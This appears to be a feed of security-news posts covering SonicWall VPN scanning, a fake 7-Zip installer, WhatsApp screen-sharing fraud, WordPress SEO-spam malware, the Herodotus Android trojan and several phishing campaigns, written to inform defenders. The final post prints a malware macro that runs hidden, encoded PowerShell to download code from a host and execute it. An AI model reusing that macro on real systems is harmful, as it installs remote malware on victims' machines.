Most of the traffic (92%) targeted a single SonicOS REST API endpoint used to check SSL VPN status. The activity was coordinated across three infrastructure clusters, with a commercial proxy network rotating over 4,000 IP addresses in short bursts to evade detection.

While this campaign focused mainly on reconnaissance, several critical SonicWall vulnerabilities remain high-risk targets:

• CVE-2024-53704 (CVSS 9.8, CISA KEV, ransomware-linked)
• CVE-2024-40766 (CVSS 9.8, used by Akira and Fog ransomware)
• CVE-2021-20028 (CVSS 9.8, CISA KEV listed)
• CVE-2024-38475 (CVSS 9.1)
• CVE-2019-7481 (CVSS 7.5, ransomware-linked)
• CVE-2022-22274 (CVSS 9.8)
• CVE-2023-0656 (CVSS 7.5)

Security researchers assess this activity as pre-exploitation reconnaissance. Attackers appear to be building a high-value list of exposed SSL VPN endpoints for future credential stuffing and vulnerability exploitation.

VPN Access Is the Fastest Way In

SonicWall SSL VPN has become a common entry point for ransomware groups, especially Akira. Researchers have shown that once attackers gain VPN access, they can move to full network encryption in under four hours — sometimes in less than one.

Recent scanning shows attackers are heavily targeting the API endpoint that reveals whether SSL VPN is enabled. This indicates they are building a target list of exposed devices before launching credential stuffing or vulnerability-based attacks.

Since March 2023, Akira has compromised hundreds of organizations and generated hundreds of millions in ransom payments. Fog ransomware has also used SonicWall VPN access as an initial foothold.

Several high-risk vulnerabilities make this worse. Five of the seven key SonicWall CVEs tied to this attack surface are listed in CISA’s Known Exploited Vulnerabilities catalog. One of the most critical is CVE-2024-53704 (CVSS 9.8), an authentication bypass flaw in SonicOS and NSv appliances that is already being exploited in the wild.

With over 430,000 SonicWall firewalls exposed to the internet — many running outdated firmware — attackers have a large and accessible attack surface.

Organized Scanning Infrastructure

GreyNoise identified four coordinated clusters behind the February 2026 scans, all focused on VPN discovery and credential testing.

Attackers used proxy networks, rotating IPs, ports, and browser fingerprints to evade detection, with nearly 70% of traffic sharing the same automated Chrome-on-Linux HTTP/1.0 signature.

Reconnaissance Before the Real Attack

This pattern closely resembles earlier campaigns where large-scale VPN scanning was followed by credential-based intrusions.

The current activity appears to be reconnaissance — mapping exposed SSL VPN services and identifying weak targets. History shows that exploitation typically follows this phase.

Organizations should immediately restrict VPN management access, enforce multi-factor authentication for all SSL VPN users, and urgently patch CVE-2024-53704 and other SonicOS vulnerabilities. Without action, this scanning phase could quickly evolve into widespread ransomware incidents.

The post Massive Scanning Campaign Targets SonicWall Firewalls appeared first on First Hackers News.

The attack begins with a convincing trap: a website made to look like the official 7-Zip page. The domain closely resembles the real one, so users trust it and download what seems like a normal installer. The software appears to function properly, which helps the infection remain hidden.

The campaign surfaced after a user shared their experience online. While building a new PC and following a tutorial, they downloaded 7-Zip from the fake site. The system showed some strange errors, but nothing serious enough to stop usage. Nearly two weeks later, Microsoft Defender finally detected a generic trojan, revealing the compromise.

How the Fake Installer Hides the Malware

Security analysis revealed that the installer includes a legitimate copy of 7-Zip along with hidden malicious files. These components are placed in system folders that most users never check, helping them stay unnoticed. The installer was digitally signed, which made it appear trustworthy during installation — although that certificate has since been revoked.

After installation, the malware establishes strong persistence. It creates Windows services that launch automatically with high privileges every time the system starts. It also modifies firewall settings to ensure its traffic can move freely without being blocked.

Turning Infected PCs into Proxy Nodes

The malware collects system details such as hardware information and network configuration, then communicates with remote servers for instructions. Its main role is to convert infected devices into residential proxy nodes.

◆ Connects to attacker-controlled servers for commands
◆ Routes third-party internet traffic through the victim’s IP address
◆ Uses encryption and obfuscation to hide communications
◆ Operates over unusual network ports to avoid detection

This setup is typical of residential proxy services, where real home IP addresses are valuable. Criminals can rent this access for fraud, scraping websites, ad abuse, and other illicit activities — all traced back to the victim’s internet connection.

Anyone who downloaded 7-Zip from the fake site should assume their system is compromised. Security tools may remove known variants, but some users may prefer a full operating system reinstall for complete safety.

To reduce risk

Always download software from official sources, double-check domain names, and watch for unexpected system changes like unknown services or firewall rule modifications.

Organizations should also block known malicious domains and monitor outbound traffic to stop infected machines from contacting attacker infrastructure.

The post Malicious 7-Zip Files Converting PCs into Proxy Nodes appeared first on First Hackers News.

Cases have been reported across the United Kingdom, India, Hong Kong, and Brazil, including a major incident in Hong Kong where a victim lost HK$5.5 million (US$700,000). The scam shows how easily trusted communication apps can be turned into attack vectors when social engineering is combined with direct access to a user’s screen.

This operation relies entirely on manipulation rather than advanced malware. Attackers make unsolicited WhatsApp video calls while pretending to be bank officials, Meta support staff, or even distressed family members, convincing users to share their screen and unknowingly expose critical data.

How Attackers Create Credibility and Urgency

Attackers use several tactics to appear credible. They often spoof local phone numbers and keep their video feed blurred or disabled to avoid revealing their identity.

To pressure the victim, they create a sense of urgency by claiming suspicious account activity, unauthorized credit card charges, or pending verification issues that require immediate action.

According to ESET security researchers, this scam is a highly effective form of remote access fraud because it combines three powerful elements: the trust created by impersonating an authority figure, the urgency generated through false threats, and the control gained through screen-sharing or remote access tools. Together, these factors give criminals near-complete visibility into a victim’s smartphone.

Once a user begins sharing their screen, the attacker’s access becomes extensive. They can see passwords, two-factor authentication codes, one-time passwords, and banking apps in real time. They may capture screenshots, direct victims to open financial apps, or persuade them to approve unauthorized transfers while pretending to “resolve” an issue.

In many cases, attackers escalate the scam by convincing users to install remote access apps like AnyDesk or TeamViewer, granting full control over the device. Some victims also unknowingly install malware such as keyloggers, which silently record sensitive information for later misuse.

From a technical standpoint, the risk is severe. If attackers gain access to incoming messages and WhatsApp verification codes through screen-sharing, they can immediately take over the victim’s WhatsApp account. With full account access, they can view conversations, financial information, and contacts.

Criminals then use the hijacked account to steal money, take over social media profiles, and impersonate the victim to target friends and family, creating a chain reaction of fraud.

Preventing Screen-Sharing Fraud

Protecting against this threat relies mostly on user awareness and careful behavior. Screen sharing should never be granted to unknown or unsolicited callers, and any urgent claims should be verified directly with official sources.

Enabling WhatsApp’s two-step verification (Settings → Account → Two-step verification) adds an essential layer of protection, ensuring attackers cannot access the account even if they obtain verification codes.

This scam underscores a core truth in cybersecurity: social engineering remains one of the most powerful tools for criminals. Staying skeptical, alert, and cautious is the strongest defense against these attacks.

‍Follow Us on: Linkedin, Instagram, Facebook to get the latest security news!

The post WhatsApp Screen-Sharing Scam Exposes Users to Data Theft appeared first on First Hackers News.

The main goal of this campaign is to spread online casino spam, which is currently the most common type of spam found on hacked websites.

Attackers take advantage of weaknesses in WordPress websites to upload spam content that promotes online casinos, especially in countries where gambling is restricted.

To stay hidden, they use several techniques:

• They create duplicate folders that look identical to real website pages.
• They replace the original page with one filled with spam links.
• Users and search engines are redirected to these fake pages without knowing.

This method works because it abuses how web servers like Apache and Nginx handle page requests before WordPress loads them.

Researchers at Sucuri also found a more advanced version of this malware.
Instead of putting malicious files only in themes or plugins, the attackers hide the code in multiple places — including inside the WordPress database with misleading names — making it much harder to detect and remove.

Hidden Malware

The malware works in layers: it alters the database and loads content dynamically to stay hidden. Researchers found the malicious script added to the bottom of the theme’s functions.php file.

The malware pulls a base64-encoded payload from the WordPress option named wp_footers_logic and runs it with PHP’s eval() function. If eval() is disabled, it saves the decoded payload to wp-content/cache/style.dat instead. The payload watches incoming requests for certain URL paths and serves cached spam when those paths are matched.

When activated, the payload loads spam content from attacker-controlled sites (for example, browsec[.]xyz). To survive cleanup, the attackers also insert reinfection code into other plugin files. That reinfection code looks for specific markers; if it doesn’t find them, it will re-insert the malicious payload into the theme’s functions.php file and the main file of the first active plugin — ensuring the SEO spam keeps returning.

Mitigation

To protect your website from SEO spam injections:

• Keep WordPress, themes, and plugins updated — outdated components are the main entry point.
• Remove unused plugins and themes — fewer components means fewer vulnerabilities.
• Enable file integrity monitoring — detect unauthorized changes to core files like functions.php.
• Restrict write permissions on /wp-content/, /wp-includes/, and plugins/themes.
• Use a Web Application Firewall (WAF) to block malicious requests and known exploit patterns.
• Scan for unexpected database entries (especially unusual wp_options keys).
• Change all admin credentials, and enforce MFA for logins.

If you suspect a compromise:

• Restore clean versions of core files.
• Audit functions.php, plugin files, and the database for hidden code or base64 content.
• Clear all cache directories — many SEO spam payloads hide there.

The post Websites Compromised to Boost Hacker SEO appeared first on First Hackers News.

All about the malware-Herodotus

Found alongside Hook and Octo during routine monitoring, the samples more closely resemble Brokewell but include original code for advanced evasion. Active campaigns target users in Italy and Brazil, and the malware is being sold as Malware-as-a-Service by a threat actor named K1R0.

ThreatFabric found Herodotus follows modern banking-trojan trends but adds human-like remote-control input to evade behavioral biometric detection.

Herodotus begins with side-loading often delivered through SMiShing links that lure victims to malicious downloads. A custom dropper circumvents Android 13+ Accessibility Service restrictions by auto-installing the payload, opening the Accessibility settings and displaying a convincing loading overlay that hides the prompts used to grant powerful permissions.

After activation the trojan fingerprints the device by collecting the installed apps and sends that inventory to its command-and-control server, which returns a tailored list of high-value targets and overlay URLs.

The malware then injects realistic-looking fake login screens over legitimate banking apps and intercepts incoming SMS messages so it can harvest credentials and one-time codes in real time.

Where Herodotus stands out is in how it performs input during remote takeover. Instead of pasting whole strings via ACTION_SET_TEXT or the clipboard, which creates instant, machine-like input patterns, it breaks operator-supplied text into single characters and inserts them at randomized intervals.

This per-character, delayed typing produces timing and rhythm very similar to human typing, reducing anomaly signals and making behavioral anti-fraud systems less likely to flag the session as automated.

Herodotus inserts 300–3000 ms delays between keystrokes to mimic human typing and try to fool basic behavioral detectors, though advanced profiling systems can still spot anomalies. Operators enable it with a “Delayed text” checkbox in the control panel.

Indicators of Compromise

Sample

The post Herodotus mimics humans to bypass biometrics appeared first on First Hackers News.

Instead of spoofing domains, they registered free consumer accounts and sent phishing emails through Nifty’s own mail servers—such as mta-snd-e0X.mail.nifty[.]com—using IP ranges like 106.153.226.0/24 and 106.153.227.0/24.

Discovered by Raven, a leading threat detection firm, the campaign bypassed traditional email defenses by passing SPF, DKIM, and DMARC checks. This allowed the emails to evade most secure email gateways (SEGs), which rely heavily on broken authentication or known bad domains to detect threats.

The operation unfolded in several waves, starting on April 28 with lures themed around an “Execution Agreement,” followed by waves on May 7 and May 16 using “SAFE Agreement” themes. A spike in activity occurred on May 23, when dozens of emails were sent in under a minute—indicating automation and likely phishing kit usage.

Instead of links, emails carried attachments like PDFs and HTML files (e.g., SAFE_Terms_May2025.pdf, Execution_Agreement.html) that triggered redirect chains via legitimate tracking tools, ultimately leading to phishing sites hosted on obfuscated domains such as 2vf78gnafutdc5zqmhng[.]iqmwpx[.]ru.

These sites were designed to steal credentials and hijack Gmail sessions through token theft.

Adaptive Attack Waves Exploit Trust and Evasion Tactics

The phishing campaign leveraging Nifty[.]com didn’t rely on crude techniques—it evolved with each wave, making detection increasingly difficult. Attackers used advanced evasion methods such as HTML padding with whitespace characters, multipart MIME structures to conceal payloads, and display name spoofing like “Name via DocuSign.”

The emails also featured AI-generated content with near-perfect grammar, allowing them to slip past conventional security filters.

Raven, the threat detection firm that uncovered this campaign, flagged it through behavioral anomalies—unusual sender-recipient patterns, repeated contract-themed lures, consistent attachment naming, and redirect chains leading to suspicious domains.

These indicators helped detect threats that otherwise looked legitimate on the surface.

This medium-to-high sophistication attack highlights a major blind spot in traditional email security systems. With valid SPF, DKIM, and DMARC, and no malicious links in the message body, most secure email gateways failed to flag these emails as threats.

The use of authenticated infrastructure, coupled with adaptive and stealthy delivery techniques, reflects a growing trend: phishing actors are embedding themselves within trusted environments to boost success rates.

Raven’s ability to detect this campaign—even with clean headers and valid authentication—proves the importance of advanced detection methods. Organizations must move beyond outdated filters and adopt tools that analyze behavior, content context, and hidden redirection techniques.

To stay ahead, email defenses must evolve to detect not just what’s obviously malicious, but what subtly blends in.

The post Nifty[.]com Infrastructure Exploited in Phishing Attack appeared first on First Hackers News.

Why DocuSign Is Being Abused

Attackers are using fake DocuSign emails to trick people into sharing login credentials or financial details. These phishing messages often look like real DocuSign requests, asking users to “review documents” through yellow buttons or QR codes.

Clicking these links or scanning the QR codes takes users to fake sites—often designed to look like Microsoft login pages—where sensitive information is stolen.

QR-based phishing is especially dangerous because mobile devices often lack strong security tools, making it easier for attackers to slip through undetected.

These attacks don’t just steal data—they can lead to full network breaches, allowing attackers to move across systems, gain higher access, or even install ransomware.

Cybercriminals are now using real DocuSign accounts to send phishing emails that look completely legitimate. These fake emails often pretend to come from suppliers, government offices, or even HR departments.

Some scams involve fake invoices to steal money. Others use refund fraud tricks, asking people to share personal details over the phone. Some attackers even use DocuSign’s APIs to create official-looking notifications that blend trust with deception.

These scams can lead to:

• Unauthorized access to company systems
• Financial losses
• Personal data leaks on the dark web

A single compromised account can quickly snowball into a much larger breach.

How to Stay Protected

According to an ESET report, businesses should use a multi-layered security approach:

• Train employees to spot phishing emails. Look out for strange sender addresses, odd grammar, or mismatched email signatures.
• Don’t click links in DocuSign emails. Real DocuSign messages include a security code—log in directly on their site to access documents.
• Use multi-factor authentication (MFA) to protect all business accounts.
• Enforce strong passwords with a password manager.
• Install advanced security tools like ESET to detect malicious links and attachments.
• Report suspicious emails to your IT team and DocuSign’s official spam reporting channel.

In Case of a Breach

If you suspect a compromise:

• Change passwords immediately
• Scan for malware
• Isolate affected devices
• Monitor the dark web for leaked data

DocuSign makes online workflows easier—but always double-check emails before clicking. Trust should never replace caution in today’s threat landscape.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Threat Actors Use Fake DocuSign for Corporate Data Theft appeared first on First Hackers News.

The site mimics a genuine flight booking service, using professional design and SSL encryption to appear trustworthy. Visitors see a familiar travel booking page with flight search options and promises like “lowest fare guaranteed” and “easy booking process.”

But behind this facade, the site is capturing sensitive data such as names, phone numbers, emails, and possibly financial details, tricking users into thinking they’re using an official government service.

InfoSec Write-ups analysts found the malicious domain is part of an impersonation campaign active since July 2022. ThreatWatch360 researchers reported the site is hosted on IP 167[.]172[.]151[.]4 and uses a Let’s Encrypt SSL certificate to seem secure.

The domain is registered under the name Ali Sajil from Kerala, India, though this may be fake.

This phishing attack poses a serious risk to India’s digital services by damaging public trust and exposing users to identity theft and financial fraud. It comes at a time when digital travel services are growing in popularity, making the threat even more concerning.

How the Scam Works

The fake website uses advanced techniques to appear legitimate and collect user data. The domain name digiyatra[.]in was chosen to match the real DigiYatra brand and trick users.

It uses an SSL certificate that includes both the main domain and an app subdomain (app.digiyatra.in), hinting at possible plans to fake a mobile app as well.

The site’s design closely copies real travel booking platforms but doesn’t actually process any bookings. Instead, it collects personal information, which may be sold on the dark web or used for future scams targeting Indian citizens.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Fake DigiYatra Apps Steal Indian Financial Data appeared first on First Hackers News.

The scam uses familiar work-related messaging to steal login credentials.

Researchers warn that the fake meeting page looks convincing, even showing a video of fake “participants” to make it seem real.

The urgent tone in the email pushes users to click links quickly, increasing the risk of falling for the scam.

Sophisticated Phishing Scam Targets Zoom Users

A new phishing scam is fooling users with fake Zoom emails that closely mimic real meeting invites. These emails copy Zoom’s branding and formatting to avoid suspicion.

When users click the link, they’re taken to a fake meeting page that asks for their Zoom login or other sensitive info. The fake sites use domain names that look almost identical to real ones.

Experts say stolen credentials can lead to wider network breaches, as attackers may use them to access company systems.

The phishing emails use personalized links, hinting that attackers may have prior data on targets—making the scam more believable. This approach shows a higher level of planning than usual phishing attacks.

The scam also plays on urgency and fear of missing important meetings, making users more likely to click without thinking.

To stay safe, users should avoid clicking suspicious links and verify unexpected invites directly with coworkers. Companies should use strong email filters, train staff on phishing awareness, and enable multi-factor authentication (MFA) to protect against stolen passwords.

Indicators of Compromise (IoCs)

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!

The post Zoom Phishing Steals Login Credentials appeared first on First Hackers News.

These emails are crafted to appear as if they come from legitimate government sources, making them more convincing. The attached Word documents contain embedded macros that, once enabled, trigger a multi-stage malware infection.

The malicious documents are disguised as official briefings or intelligence reports about the Pahalgam incident. They prompt recipients to “Enable Content” to view the file, which silently activates hidden malware.

The attackers designed these files with realistic letterheads and formatting to mimic genuine government communications. Seqrite researchers discovered the campaign after noticing unusual network traffic from government systems.

Their analysis revealed a previously unknown Remote Access Trojan (RAT) that stays hidden on infected devices and connects to servers linked to a known nation-state group that has targeted Indian government agencies in the past.

Experts believe this is a highly targeted and sophisticated operation, aimed at collecting sensitive information from defense, intelligence, and law enforcement networks. The campaign’s timing—right after the Pahalgam attack—shows the attackers are using current events to increase their success.

All about the attack

The attack starts when victims open a file named “Pahalgam_Incident_Report_Confidential.docx”. If they enable macros, hidden VBA code runs a PowerShell command to launch the malware.

Sub AutoOpen()
Dim str As String
str = “powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM=”
Shell str, vbHide
End Sub

The PowerShell command downloads more malware hidden in a fake PNG file. It sets up persistence using scheduled tasks and Registry changes, then gathers system info, steals data, and tries to spread across government networks.

Indicators of Compromise (IOCs)

The post Pahalgam Attack Lure Used in Cyberattacks Against Indian Government appeared first on First Hackers News.